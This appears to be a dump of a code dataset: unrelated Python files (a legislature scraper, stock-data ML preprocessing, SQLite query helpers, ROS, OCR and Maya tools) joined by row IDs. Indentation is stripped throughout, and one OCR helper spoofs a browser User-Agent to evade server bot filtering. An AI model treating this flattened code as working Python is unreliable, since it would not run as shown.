# end_date=maybe_date(self.kwargs["session"].get("end_date", "")),
# )
@attr.s(auto_attribs=True)
class PartialMember:
name: str
url: str
image: str = None
class MemberList(HtmlListPage):
session_id = "211" # 2021
source = f"http://lis.virginia.gov/{session_id}/mbr/MBR.HTM"
def process_item(self, item):
name = item.text
lname = name.lower()
if "resigned" in lname or "vacated" in lname or "retired" in lname:
return
name, action, date = clean_name(name)
return PartialMember(name=name, url=item.get("href"))
class SenateList(MemberList):
chamber = "upper"
selector = XPath('//div[@class="lColRt"]/ul/li/a')
class DelegateList(MemberList):
chamber = "lower"
selector = XPath('//div[@class="lColLt"]/ul/li/a')
class MemberDetail(HtmlPage):
input_type = PartialMember
def get_source_from_input(self):
return self.input.url
def process_page(self):
party_district_text = self.root.xpath("//h3/font/text()")[0]
party, district = get_party_district(party_district_text)
p = Person(
name=self.input.name, state="va", chamber=self.chamber, party=party, district=district,
)
if self.input.image:
p.image = self.input.image
p.add_link(self.source.url)
p.add_source(self.source.url)
self.get_offices(p)
return p
def get_offices(self, person):
for ul in self.root.xpath('//ul[@class="linkNon" and normalize-space()]'):
address = []
phone = None
email = None
for li in ul.getchildren():
text = li.text_content()
if re.match(r"\(\d{3}\)", text):
phone = text.strip()
elif text.startswith("email:"):
email = text.strip("email: ").strip()
else:
address.append(text.strip())
if "Capitol Square" in address:
office_obj = person.capitol_office
else:
office_obj = person.district_office
office_obj.address = "; ".join(address)
if phone:
office_obj.voice = phone
if email:
person.email = email
class SenateDetail(MemberDetail):
input_type = PartialMember
role = "Senator"
chamber = "upper"
class SenatePhotoDetail(HtmlPage):
input_type = PartialMember
def get_source_from_input(self):
lis_id = get_lis_id("upper", self.input.url)
return f"http://apps.senate.virginia.gov/Senator/memberpage.php?id={lis_id}"
def process_page(self):
src = self.root.xpath('.//img[@class="profile_pic"]/@src')
img = src[0] if src else None
if img and img.startswith("//"):
img = "https:" + img
self.input.image = img
return self.input
class DelegateDetail(MemberDetail):
role = "Delegate"
chamber = "lower"
def process_page(self):
p = super().process_page()
lis_id = get_lis_id(self.chamber, self.input.url)
if lis_id:
lis_id = "{}{:04d}".format(lis_id[0], int(lis_id[1:]))
p.image = f"http://memdata.virginiageneralassembly.gov/images/display_image/{lis_id}"
return p
senators = Workflow(SenateList(), (SenatePhotoDetail, SenateDetail))
delegates = Workflow(DelegateList(), DelegateDetail)
|
15,736 | 1e3f340e1c57ed35cd1c7af1afbacb497e9ebb46 | import timeit
'''
start_time = timeit.default_timer()
some_function()
print( '{:.99f}'.format( timeit.default_timer() - start_time ).rstrip('0').rstrip('.') )
'''
import pandas as pd
import numpy as np
import datetime
import ml_trader.config as config
import ml_trader.utils as utils
import ml_trader.utils.file as file
import ml_trader.utils.data.meta as meta
import ml_trader.utils.stock.indicators as stock_indicators
import ml_trader.utils.data.imports.get as get
from pprint import pprint
from sklearn import preprocessing
#from ml_trader.utils.compute import earnings
def prepare_labels_feat( data ):
'''
Transform data
'''
history_points = config.history_points
# The first day of trading that stock often looked anomalous due to the massively high volume (IPO).
# This inflated max volume value also affected how other volume values in the dataset were scaled when normalising the data,
# so we drop the oldest data point out of every set)
data.sort_values( 'date', inplace=True, ascending=True )
data['date'] = pd.to_datetime( data['date'] ) # Convert to datetime
data['weekday_num'] = data['date'].apply( lambda x: x.weekday() ) # Get weekday_num as a feature
data['date'] = data['date'].apply( utils.convert_to_timestamp ) # Convert to unix timestamp which can be normalized
dates = data['date'].values
# remove date column
data = data.drop( 'date', axis=1 )
# Remove first date since IPO's tend to swing wildly on the first day
# of open and may confuse the model
data = data.iloc[1:].values # Convert to numpy array
# Normalise the data — scale it between 0 and 1 — to improve how quickly our network converges
normaliser = preprocessing.MinMaxScaler()
data_normalised = normaliser.fit_transform( data ) # Normalize all columns
'''
Using the last {history_points} open close high low volume data points, predict the next value
Loop through all the stock data, and add build a normalized dataset that include x number of ohlcv history items for each stock date
Lob off the first x items as they won't include x previous date
x = history_points
'''
#TODO: Figure out why 'i+1:i + history_points+1' works, but not i:i + history_points
#feat_ohlcv_histories_normalised = np.array( [data_normalised[i+1:i + history_points+1].copy() for i in range( len( data_normalised ) - history_points )] )
feat_ohlcv_histories_normalised = np.array( [data_normalised[i:i + history_points].copy() for i in range( len( data_normalised ) - history_points )] )
# Normalize technical indictors
feat_technical_indicators_normalised = stock_indicators.get_technical_indicators( preprocessing.MinMaxScaler(), feat_ohlcv_histories_normalised )
# Get normalized 'close' values, so model can be trained to predict this item
labels_scaled = np.array( [data_normalised[:, meta.column_index[meta.label_column]][i + history_points].copy() for i in range( len( data_normalised ) - history_points )] )
labels_scaled = np.expand_dims( labels_scaled, -1 ) #NICE: each item added to its own array and this is super fast
labels_unscaled = np.array( [data[:, meta.column_index[meta.label_column]][i + history_points].copy() for i in range( len( data ) - history_points )] )
labels_unscaled = np.expand_dims( labels_unscaled, -1 ) #NICE: each item added to its own array and this is super fast
label_normaliser = preprocessing.MinMaxScaler()
label_normaliser.fit( labels_unscaled )
# Get dates in a single column
dates = np.array( [dates[i + history_points].copy() for i in range( len( data ) - history_points )] )
assert feat_ohlcv_histories_normalised.shape[0] == labels_scaled.shape[0] == feat_technical_indicators_normalised.shape[0]
return dates, feat_ohlcv_histories_normalised, feat_technical_indicators_normalised, labels_scaled, labels_unscaled, label_normaliser
class Preprocess:
def __init__( self, test_split=False ):
self.dates, self.ohlcv_histories, self.technical_indicators, \
self.scaled_y, self.unscaled_y, \
self.y_normaliser = prepare_labels_feat( get.dataset() )
print( "\n\n** Print data shapes: " )
print( "*********************************" )
print( "dates:", len( self.dates ) )
print( "ohlcv_histories:", len( self.ohlcv_histories ) )
print( "technical_indicators:", len( self.technical_indicators ) )
print( "scaled_y:", len( self.scaled_y ) )
print( "unscaled_y:", len( self.unscaled_y ) )
print( "*********************************\n\n" )
if test_split:
self.n_split = int( self.ohlcv_histories.shape[0] * test_split )
def get_unscaled_data( self ):
return ( self.unscaled_y[self.n_split:] )
def get_training_data( self ):
return ( self.ohlcv_histories[:self.n_split], self.technical_indicators[:self.n_split], self.scaled_y[:self.n_split], self.dates[:self.n_split] )
def get_test_data( self ):
return ( self.ohlcv_histories[self.n_split:], self.technical_indicators[self.n_split:], self.scaled_y[self.n_split:], self.dates[self.n_split:] )
def get_y_normalizer( self ):
return self.y_normaliser
def get_history_for_date( self, date ):
dates = np.array( [datetime.datetime.fromtimestamp( i ) for i in self.dates] )
date_min = dates.min()
date_max = dates.max()
if ( date > date_min and date <= date_max ):
idx = np.searchsorted( dates, date )
return ( self.ohlcv_histories[idx], self.technical_indicators[idx], self.scaled_y[idx], self.dates[idx] )
else:
raise Exception( "Date ranges should be between '%s' & '%s'" % ( date_min.strftime( '%b %d, %Y' ), date_max.strftime( '%b %d, %Y' ) ) )
|
15,737 | 4a1032ecfd5e62dc26971720332d61ab29b1f724 | import typing as t
import typing_extensions as te
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
import datetime
import os
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import TimeSeriesSplit, cross_validate
from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin
from sklearn.ensemble import RandomForestRegressor
from sklearn.pipeline import Pipeline
from sklearn.model_selection import TimeSeriesSplit, cross_validate
from sklearn.metrics import make_scorer
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
from sklearn.model_selection import GridSearchCV
class DatasetReader(te.Protocol):
def __call__(self) -> pd.DataFrame:
...
SplitName = te.Literal["train", "test"]
def get_dataset(reader: DatasetReader, splits: t.Iterable[SplitName]):
df = reader()
df = clean_dataset(df)
y = df["cnt"]
X = df[['season', 'holiday', 'weekday', 'workingday', 'weathersit','temp',
'atemp', 'hum', 'windspeed', 'Yesterday', 'diff']]
X_train = df[:'2011'].drop(['cnt'], axis=1)
y_train = df.loc[:'2011','cnt']
X_test = df['2012'].drop(['cnt'], axis=1)
y_test = df.loc['2012','cnt']
split_mapping = {"train": (X_train, y_train), "test": (X_test, y_test)}
return {k: split_mapping[k] for k in splits}
def clean_dataset(df: pd.DataFrame) -> pd.DataFrame:
cleaning_fn = _chain(
[
_fix_drop_instant,
_fix_datetime,
_fix_dias_faltantes,
_fix_organize_by_days,
_fix_add_yesterday
]
)
df = cleaning_fn(df)
return df
def _chain(functions: t.List[t.Callable[[pd.DataFrame], pd.DataFrame]]):
def helper(df):
for fn in functions:
df = fn(df)
return df
return helper
def _fix_drop_instant(df):
df = df.drop(columns='instant', axis=1)
return df
def _fix_datetime(df):
df['dteday'] = df['dteday'].astype('str')
df['hour'] = df['hr'].astype('str')+':00'
df['Datetime'] = df['dteday']+' '+df['hour']
df['Datetime'] = pd.to_datetime(df['Datetime'])
df = df.set_index('Datetime')
return df
def _fix_dias_faltantes(df):
df = df.asfreq(freq='60min', method='ffill')
return df
def _fix_organize_by_days(df):
df['day'] = df.index.day_name()
feature_columns_1 = ['day','season', 'holiday', 'weekday',
'workingday', 'weathersit', 'temp', 'atemp', 'hum', 'windspeed','cnt'
]
df = df[feature_columns_1].resample('D').mean()
return df
def _fix_add_yesterday(df):
df = df[['cnt','season', 'holiday', 'weekday',
'workingday', 'weathersit', 'temp', 'atemp', 'hum', 'windspeed']]
df.loc[:,'Yesterday'] = df.loc[:,'cnt'].shift()
df.loc[:,'diff'] = df.loc[:,'Yesterday'].diff()
df = df.dropna()
return df
|
15,738 | 0b1f4e0d1f7be6e77d1cc21b26951b4b18a5a921 | class Card:
def __init__(self, action, id):
self.action = action.lower()
self.id = id.lower()
self.image = self.action + ('' if self.id == '' else ' ') + self.id + '.jpg'
self.flipped = False
def __str__(self):
return self.action
|
15,739 | 4853eae150c6ff01024f488f9d8dd057777dd400 | #!/usr/bin/env python
import rospy
from geometry_msgs.msg import PoseStamped
from visualization_msgs.msg import Marker
pub = rospy.Publisher('/gateway/marker', Marker, queue_size = 10)
def callback(data):
m = Marker()
m.header.frame_id = data.header.frame_id
# m.header.stamp = rospy.get_time()
m.ns = 'ncvrl'
m.id = 0
m.type = 2
# m.pose.position.x = 0
# m.pose.position.y = 0
# m.pose.position.z = 0
# m.pose.orientation.x = 0
# m.pose.orientation.y = 0
# m.pose.orientation.z = 0
# m.pose.orientation.w = 1.0
m.pose = data.pose
m.scale.x = 0.2
m.scale.y = 0.2
m.scale.z = 0.2
m.color.a = 0.5
m.color.r = 0.0
m.color.g = 1.0
m.color.b = 0.0
pub.publish(m);
def gateway():
rospy.init_node('gateway_pose_stamped_to_marker', anonymous=True)
rospy.Subscriber("/pose_tag", PoseStamped, callback)
rospy.spin()
if __name__ == '__main__':
gateway()
|
15,740 | 124f566ddf3cee7f8c11ad930b2016f2576a9115 | import pytesseract as tess
from PIL import Image
import urllib.request
from PIL import Image
async def imageToText(url):
# get the image from the url, setting to a known browser agent
# because of mod_security or some similar server security feature
# which blocks known spider/bot user agents
class AppURLopener(urllib.request.FancyURLopener):
version = "Mozilla/5.0"
opener = AppURLopener()
response = opener.open(url)
img = Image.open(response)
#access tesseract module
tess.pytesseract.tesseract_cmd ='C:\Program Files\Tesseract-OCR/tesseract.exe'
result = tess.image_to_string(img)
#remove an auto added character at the beginning of the string if the image had no text
print("analuyzying")
print(result)
return result[:-1] |
15,741 | 1494ba956dfb6f37c7491a0d59ff14185dc12827 | """
! what?
the `multiprocessing` module includes an API for
dividing work between multiple processes based on the API for `threading`
+------------------+-----------------------------------------------------------+-----------------+
| concepts | explanation | originated from |
+==================+===========================================================+=================+
| threading | implements concurrency thru application threads | CPU threads |
+------------------+-----------------------------------------------------------+-----------------+
| mutliprocessing | implements concurrency using system processes | System processes|
+------------------+-----------------------------------------------------------+-----------------+
| asyncio | use a single-threaded, single-process approach | see below |
| | in which parts of an application cooperate to switch | |
| | tasks explicitly at optimal times. | |
+------------------+-----------------------------------------------------------+-----------------+
| concurrent. | implements thread and process-based executors | |
| futures | for managing resources pools for running concurrent tasks | |
+------------------+-----------------------------------------------------------+-----------------+
! why?
in some cases, `multiprocessing` is a drop-in replacement,
and can be used instead of `threading` to take advantage of multiple CPU cores
and there by avoid computational bottlenecks accociated with Python's GIL(global interpreter lock)
NOTE:
插入式替换(drop-in replacement) is a term used in computer science and other fields.
it refers to the ability to replace one hardware (or software) components with another one
w/o any other code or configuration changes being required and resulting in no negative impacts.
usually, the replacement has some benefits including one or more of the following.
- increased security
- increased speed
- increased feature set
- increased compatibility (e.g. with other components or standards support)
- increased support (e.g. the old component may no longer be supported, maintained, or manufactured)
! how?
multiprocess
|-- multiprocess Basics
|-- importable Target functions
|-- determine the current process
|-- daemon processes
|-- wait for processes
|-- terminate processes
|-- process Exit Status
|-- logging
|-- subclass process
|-- pass between processes
|-- signal between processes
|-- control access to resources
|-- synchronize operations
|-- control concurrent access to resources
|-- manage shared state
|-- shared namespace
|-- process pools
|-- implement MapReduce
""" |
15,742 | 12531f0ddfbe44de46d84fe6ebbaf7d28b2eccc9 | # Copyright 2018 Jose Cambronero and Phillip Stanley-Marbell
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject
# to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR
# ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
# CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import numpy as np
import pandas as pd
import sqlite3 as db
import dbtypes
from specimen import utils
def read_sql(sql, conn):
# read sql with pandas but make sure column names are lowercase
df = pd.read_sql(sql, conn)
df.columns = df.columns.map(lambda x: x.lower())
return df
class SpecimenQueries:
"""
Contains helpful specimen database queries. Should be used as a starting point for analysis of specimen
data.
"""
def __init__(self, database_path=None):
"""
Provides wrapper for queries. Caches queries where possible.
:param database_path: Path to SQLITE database file
"""
self.database_path = database_path
self.conn = db.connect(database=self.database_path)
# start use of foreign keys
_cursor = self.conn.cursor()
_cursor.execute('PRAGMA foreign_keys = ON')
_cursor.close()
self.cache = {}
def _clear_cache(self):
""" Clear cache, which stores prior query results """
self.cache = {}
def _drop_tables(self, tables):
"""
Drop a set of tables from db (often used to materialize intermediate tables for ease of querying and
then removing these to avoid affecting db state)
:param tables: list of tables to drop
:return: drops if they exist, ignores otherwise
"""
cursor = self.conn.cursor()
try:
cursor.execute('DROP TABLE ' + ','.join(map(str, tables)))
except:
pass
finally:
cursor.close()
def _get_unknown_userid(self):
"""
Retrieve user id associated with unknown user
"""
cursor = self.conn.cursor()
unknown_user_str = dbtypes.User.null
cursor.execute("select id from users where uniqueid='%s'" % unknown_user_str)
return cursor.fetchone()[0]
def users_and_countries(self, use_cache=True):
"""
Returns a table with userid and most likely country (based on carrier location frequency).
:param use_cache: if true uses cached result, else clears database state and reruns query
:return: pandas dataframe
"""
key = 'user_and_countries'
if use_cache and key in self.cache:
return self.cache[key].copy()
cursor = self.conn.cursor()
if not use_cache:
self._drop_tables(['user_country_freqs', 'user_and_likely_country'])
# userid for unknown user
unknown_user_id = self._get_unknown_userid()
# can only return country info if userid is known
cursor.execute(
"""
CREATE TEMP TABLE user_country_freqs AS
select userid, country, count(*) as ct
from sessions where userid <> %d and country is not null
group by userid, country
""" % unknown_user_id
)
# assigns each user to country with most counts
cursor.execute(
"""
CREATE TEMP TABLE user_and_likely_country AS
SELECT *
FROM
user_country_freqs JOIN (SELECT userid, max(ct) as max_ct FROM user_country_freqs GROUP BY userid) max_cts
USING (userid)
WHERE user_country_freqs.ct = max_cts.max_ct
GROUP BY userid
"""
)
cursor.close()
result = read_sql('SELECT * FROM user_and_likely_country', self.conn)
self.cache[key] = result.copy()
return result
def create_reference_ids_table(self, vals, table_name='_ref'):
"""
Create a temporary reference table by inserting values.
This is used to speed up sqlite queries that are too slow when given
the list directly in the query text (most likely a parsing issue?).
"""
# remove existing
self._drop_tables([table_name])
cursor = self.conn.cursor()
cursor.execute('CREATE TEMP TABLE %s (id INTEGER)' % table_name)
for i, v in enumerate(vals):
cursor.execute('INSERT INTO %s VALUES(%d)' % (table_name, v))
def get_time_offset(self, event_ids, get_extra_info=True, use_cache=True):
"""
Compute the time offset from the start of a session for a list of events.
Only possible with data from JSON files. CSV files have dummy timestamps.
:param event_ids: list of event ids to query
"""
print "Warning: This is only valid for data from the json files! Timestamps in csv are dummies"
if event_ids is None:
raise ValueError('Must provide event ids ts')
key = ('timestamps', tuple(event_ids), get_extra_info)
if use_cache and key in self.cache:
return self.cache[key].copy()
# create event id references to query
self.create_reference_ids_table(event_ids, table_name='_ref')
ts_query = """
SELECT events.id as id, offsettimestamp, event FROM events, _ref
WHERE events.id = _ref.id AND offsettimestamp >= 0
"""
ts = read_sql(ts_query, self.conn)
# adds additional information such as user id, and session id for matching up timestamps
if get_extra_info:
extra_info_query = """
SELECT
sessions.userid,
events.id AS id,
sessions.id AS sessionid
FROM events, sessions, _ref
WHERE events.id = _ref.id AND
events.sessionid = sessions.id
"""
extra_info_df = read_sql(extra_info_query, self.conn)
ts = ts.merge(extra_info_df, how='left', on='id')
self.cache[key] = ts.copy()
return ts
def get_devices(self, event_ids, use_cache=True):
"""
Query the devices associated with particular event ids.
:param event_ids: list of event ids to query
"""
if event_ids is None:
raise ValueError('Must provide event ids')
# cast to tuple so that can be hashed
key = ('devices', tuple(event_ids))
if use_cache and key in self.cache:
return self.cache[key].copy()
# create event id references to query
self.create_reference_ids_table(event_ids, table_name='_ref')
devices_query = """
select
devices.name as device_name,
events.id as eventid
FROM
sessions, events, devices, _ref
WHERE
events.id = _ref.id AND
sessions.id = events.sessionid AND
sessions.deviceid = devices.id
"""
devices_df = read_sql(devices_query, self.conn)
self.cache[key] = devices_df.copy()
return devices_df
def base_selections(self, min_turns=50, which='all', add_fields=None, use_cache=True):
"""
Obtain base selections data, consisting of selections for known userids (i.e. this
precludes data from the CSV files from Flurry, which do not have known user ids associated
with each record). Selects only the first turn in a 'play',
to control for game play. Selects data for users with at least `min_turns` such turns. Caches results
:param min_turns: minimum number of first turns necessary for data, if 0, returns all
:param which: one of 'all', 'correct', 'incorrect', determines what kind of selections are returned
:param add_fields: add extra base fields from table selectionevents. If dict, uses keys as fields
and values as names, if list uses elements as fields and names
:param use_cache: if true, uses cached results, else clears database state and reruns.
:return: pandas dataframe
"""
if min_turns < 0:
raise ValueError('min_turns must be > 0')
if add_fields and not utils.is_iterable(add_fields):
raise ValueError('add_fields must be iterable')
if not which in ['all', 'correct', 'incorrect']:
raise ValueError("which must be one of 'all', 'correct', 'incorrect'")
key = ('first_sels', min_turns, which, add_fields)
if use_cache:
if key in self.cache:
return self.cache[key].copy()
else:
# we may have created tables for different optional args (i.e. diff min_turns)
self._drop_tables(['first_sels', 'enough_plays'])
if not use_cache:
self._drop_tables(['first_sels', 'enough_plays'])
# cobble together additional fields from selectionevents
added = ""
if add_fields:
if not isinstance(add_fields, dict):
add_fields = dict(zip(add_fields, add_fields))
added = ", " + (".".join(["%s as %s" % (f,n) for f, n in add_fields.iteritems()]))
cursor = self.conn.cursor()
# unknown user id
unknown_user_id = self._get_unknown_userid()
# filter to base data consisting of first-turns in play for known user ids
print "Filtering down to first-turns in a play"
cursor.execute("""
-- compute the smallest eventid associated with each playid
CREATE TEMP TABLE sel_cts AS
SELECT MIN(eventid) as min_event_id
FROM selectionevents
where userid <> %d
GROUP BY playid
""" % unknown_user_id)
print "Retrieving selection information for those turns"
cursor.execute("""
-- use this min eventid to select the first choice in each round
CREATE TEMP TABLE first_sels AS
SELECT
userid, playid, id as selid, eventid,
target_r, target_g, target_b,
specimen_r, specimen_g, specimen_b,
target_lab_l, target_lab_a, target_lab_b,
specimen_lab_l, specimen_lab_a, specimen_lab_b,
is_first_pick,
target_h,
target_s,
target_v,
specimen_h,
correct
%s
FROM
selectionevents
INNER JOIN sel_cts
ON selectionevents.eventid = sel_cts.min_event_id
WHERE userid <> %d
""" % (added, unknown_user_id)
)
# restrict to subset of users with at least min_turns
if min_turns:
cursor.execute(
"""
CREATE TEMP TABLE enough_plays as
SELECT userid FROM first_sels GROUP BY userid HAVING count(*) >= %s
""" % min_turns
)
cursor.execute('DELETE FROM first_sels WHERE NOT userid IN (SELECT userid FROM enough_plays)')
cursor.close()
# filter to type of selections requested
if which == 'all':
results = read_sql('SELECT * FROM first_sels', self.conn)
elif which == 'correct':
results = read_sql('SELECT * FROM first_sels WHERE correct', self.conn)
else:
results = read_sql('SELECT * FROM first_sels WHERE NOT correct', self.conn)
self.cache[key] = results.copy()
return results
def execute_adhoc(self, query, use_cache=True):
"""
Execute ad-hoc queries over the Specimen database.
:param query: String SQL query
"""
key = query
if use_cache and key in self.cache:
return self.cache[key].copy()
results = read_sql(query, self.conn)
self.cache[key] = results.copy()
return results
|
15,743 | d08cf62b670389e2e80c97b3a0f01a1e249f10e7 | #Exercício Python 112: Dentro do pacote utilidadesCeV que criamos no desafio 111,
# temos um módulo chamado dado. Crie uma função chamada leiaDinheiro() que seja capaz de
# funcionar como a função imputa(), mas com uma validação de dados para aceitar apenas valores que
# seja monetários.
from utilidades import dado
from utilidades import moeda
n = dado.leiaDinheiro('Digite um valor: ')
moeda.resumo(n, 20, 12)
|
15,744 | 9d03d287539eccbe32d684b4173e3d43d898dfb7 | import Player
import Ball
running = True
screen = None
player = Player.Player()
ball = Ball.Ball()
|
15,745 | 16b25da55ed7be193f95c0169f595aa73f7a6180 | import os,sys,sip
from PyQt4 import QtGui, QtCore, uic
import maya.cmds as cmds
import maya.mel as mel
import dsCommon.dsProjectUtil as projectUtil
reload(projectUtil)
#Decalring Paths
dev = "dsDev"
live = "dsGlobal"
status = live
guiName = "vrayShapeAttrGUI.ui"
clashNameSpace = "CLASSINGELEMENT_"
if sys.platform == "linux2":
uiFile = '/' + status + '/dsCore/maya/vrayTools/%s' % guiName
else:
if status == live:
server = projectUtil.listGlobalPath()
sys.path.append(server + '/dsCore/maya/dsCommon/')
uiFile = server + '/dsCore/maya/vrayTools/%s' % guiName
else:
server = projectUtil.listDevPath()
sys.path.append(server + '/dsCore/maya/dsCommon/')
uiFile = server + '/dsCore/maya/vrayTools/%s' % guiName
print 'Loading ui file:', os.path.normpath(uiFile)
form_class, base_class = uic.loadUiType(uiFile)
#Importing maya UI
try:
import maya.OpenMayaUI as mui
except:
pass
def getMayaWindow():
'Get the maya main window as a QMainWindow instance'
ptr = mui.MQtUtil.mainWindow()
ptr = long(ptr)
return sip.wrapinstance(long(ptr), QtCore.QObject)
class dsVrayShapeAttr(form_class, base_class):
def __init__(self, parent=getMayaWindow()):
super(base_class, self).__init__(parent)
self.setupUi(self)
self.add.clicked.connect(self.addAttr)
self.remove.clicked.connect(self.removeAttr)
#Connecting buttons
self.subdivision.clicked.connect(self.subdivisionAttr)
self.disQuality.clicked.connect(self.disQualityAttr)
self.disControl.clicked.connect(self.disControlAttr)
self.roundEdges.clicked.connect(self.roundEdgesAttr)
self.userAttr.clicked.connect(self.userAttrAttr)
self.fogFade.clicked.connect(self.fogFadeAttr)
self.objectID.clicked.connect(self.objectIDAttr)
self.subDiv_render.clicked.connect(self.subDiv_Attr)
self.subDiv_uv.clicked.connect(self.subDiv_uvAttr)
self.disQuality_override.clicked.connect(self.disQualitySubAttr)
self.round_round.clicked.connect(self.roundEdgesSubAttr)
self.dis_none.clicked.connect(self.disControlTypeAttr)
self.dis_waterLevel.clicked.connect(self.disControlWaterAttr)
self.dis_type.activated.connect(self.disControlTypeDropdown)
self.dis_filter.clicked.connect(self.disControlFilterAttr)
self.dis_boundsDropdown.activated.connect(self.disControlBoundsAttr)
#Initialise Settings Attr
self.subdivisionAttr()
self.disQualityAttr()
self.disControlAttr()
self.fogFadeAttr()
self.roundEdgesAttr()
self.objectIDAttr()
self.userAttrAttr()
def addAttr(self):
onOff = 1
self.vrayAttr(onOff)
def removeAttr(self):
onOff = 0
self.vrayAttr(onOff)
#CONTROL ATTRIBUTES ENABLE/DISABLE
def subdivisionAttr(self):
if self.subdivision.checkState() == 2: state=True
else: state=False
self.subDiv_render.setEnabled(state)
self.subDiv_Attr()
def subDiv_Attr(self):
if self.subdivision.checkState() == 2:
if self.subDiv_render.checkState() == 2: state=True
else: state=False
else: state=False
self.subDiv_uv.setEnabled(state)
self.subDiv_static.setEnabled(state)
self.subDiv_uvAttr()
def subDiv_uvAttr(self):
if self.subdivision.checkState() == 2:
if self.subDiv_render.checkState() == 2:
if self.subDiv_uv.checkState() == 2: state=True
else: state=False
else: state=False
else: state=False
self.subDiv_borders.setEnabled(state)
def disQualityAttr(self):
if self.disQuality.checkState() == 2: state=True
else: state=False
self.disQuality_override.setEnabled(state)
self.disQualitySubAttr()
def disQualitySubAttr(self):
if self.disQuality.checkState() == 2:
if self.disQuality_override.checkState() == 2: state=True
else: state=False
else: state=False
self.disQuality_edge.setEnabled(state)
self.disQuality_edgeLabel.setEnabled(state)
self.disQuality_edgeSlider.setEnabled(state)
self.disQuality_max.setEnabled(state)
self.disQuality_maxLabel.setEnabled(state)
self.disQuality_maxSlider.setEnabled(state)
self.disQuality_view.setEnabled(state)
def disControlAttr(self):
if self.disControl.checkState() == 2: state=True
else: state=False
self.dis_none.setEnabled(state)
self.disControlTypeAttr()
def disControlTypeAttr(self):
if self.disControl.checkState() == 2:
if self.dis_none.checkState() == 0: state=True
else: state=False
else: state=False
self.dis_type.setEnabled(state)
self.dis_typeLabel.setEnabled(state)
self.dis_amount.setEnabled(state)
self.dis_amountLabel.setEnabled(state)
self.dis_amountSlider.setEnabled(state)
self.dis_shift.setEnabled(state)
self.dis_shiftLabel.setEnabled(state)
self.dis_shiftSlider.setEnabled(state)
self.dis_continuity.setEnabled(state)
self.dis_waterLevel.setEnabled(state)
self.dis_filter.setEnabled(state)
self.disControlWaterAttr()
self.disControlTypeDropdown()
self.disControlFilterAttr()
def disControlWaterAttr(self):
if self.disControl.checkState() == 2:
if self.dis_none.checkState() == 0:
if self.dis_waterLevel.checkState() == 2: state=True
else: state=False
else: state=False
else: state=False
self.dis_waterAmount.setEnabled(state)
self.dis_waterAmountLabel.setEnabled(state)
self.dis_waterAmountSlider.setEnabled(state)
def disControlTypeDropdown(self):
if self.disControl.checkState() == 2:
if self.dis_none.checkState() == 0:
if self.dis_type.currentIndex() == 0: state=True
else: state=False
else: state=False
else: state=False
self.dis_precision.setEnabled(state)
self.dis_precisionLabel.setEnabled(state)
self.dis_precisionSlider.setEnabled(state)
self.dis_texture.setEnabled(state)
self.dis_textureLabel.setEnabled(state)
self.dis_textureSlider.setEnabled(state)
self.dis_bounds.setEnabled(state)
if self.disControl.checkState() == 2:
if self.dis_none.checkState() == 0:
if state==True: state=False
else: state=True
else: state=False
else: state=False
self.dis_boundsDropdown.setEnabled(state)
self.dis_boundsDropdownLabel.setEnabled(state)
self.disControlBoundsAttr()
def disControlFilterAttr(self):
if self.disControl.checkState() == 2:
if self.dis_none.checkState() == 0:
if self.dis_filter.checkState() == 2: state=True
else: state=False
else: state=False
else: state=False
self.dis_filterblur.setEnabled(state)
self.dis_filterblurLabel.setEnabled(state)
self.dis_filterblurSlider.setEnabled(state)
def disControlBoundsAttr(self):
if self.disControl.checkState() == 2:
if self.dis_type.currentIndex() != 0:
if self.dis_boundsDropdown.currentIndex() == 1: state=True
else: state=False
else: state=False
else: state=False
self.dis_boundsMax.setEnabled(state)
self.dis_boundsMaxLabel.setEnabled(state)
self.dis_boundsMaxSlider.setEnabled(state)
self.dis_boundsMin.setEnabled(state)
self.dis_boundsMinLabel.setEnabled(state)
self.dis_boundsMinSlider.setEnabled(state)
def roundEdgesAttr(self):
if self.roundEdges.checkState() == 2: state=True
else: state=False
self.round_round.setEnabled(state)
self.roundEdgesSubAttr()
def roundEdgesSubAttr(self):
if self.roundEdges.checkState() == 2:
if self.round_round.checkState() == 2: state=True
else: state=False
else: state=False
self.round_radius.setEnabled(state)
self.round_radiusSlider.setEnabled(state)
self.round_radiusLabel.setEnabled(state)
def userAttrAttr(self):
if self.userAttr.checkState() == 2: state=True
else: state=False
self.user_attr.setEnabled(state)
self.user_attrLabel.setEnabled(state)
def fogFadeAttr(self):
if self.fogFade.checkState() == 2: state=True
else: state=False
self.fog_radius.setEnabled(state)
self.fog_radiusLabel.setEnabled(state)
self.fog_radiusSlider.setEnabled(state)
def objectIDAttr(self):
if self.objectID.checkState() == 2: state=True
else: state=False
self.obj_id.setEnabled(state)
self.obj_idLabel.setEnabled(state)
self.obj_idSlider.setEnabled(state)
#ACTUAL FUNCTION
def vrayAttr(self, onOff):
sel = cmds.ls(sl=True)
shapes = cmds.listRelatives(sel, ad=True, fullPath=True, type=["mesh", "nurbsSurface", "subdiv"])
for shape in shapes:
if self.subdivision.checkState() == 2:
mel.eval("vray addAttributesFromGroup %s vray_subdivision %s" % (shape, onOff))
if onOff == 1:
if self.subDiv_render.checkState() == 2:
cmds.setAttr("%s.vraySubdivEnable" % shape, 1)
if self.subDiv_uv.checkState() == 2:
cmds.setAttr("%s.vraySubdivUVs" % shape, 1)
if self.subDiv_borders.checkState() == 2: cmds.setAttr("%s.vraySubdivUVsAtBorders" % shape, 1)
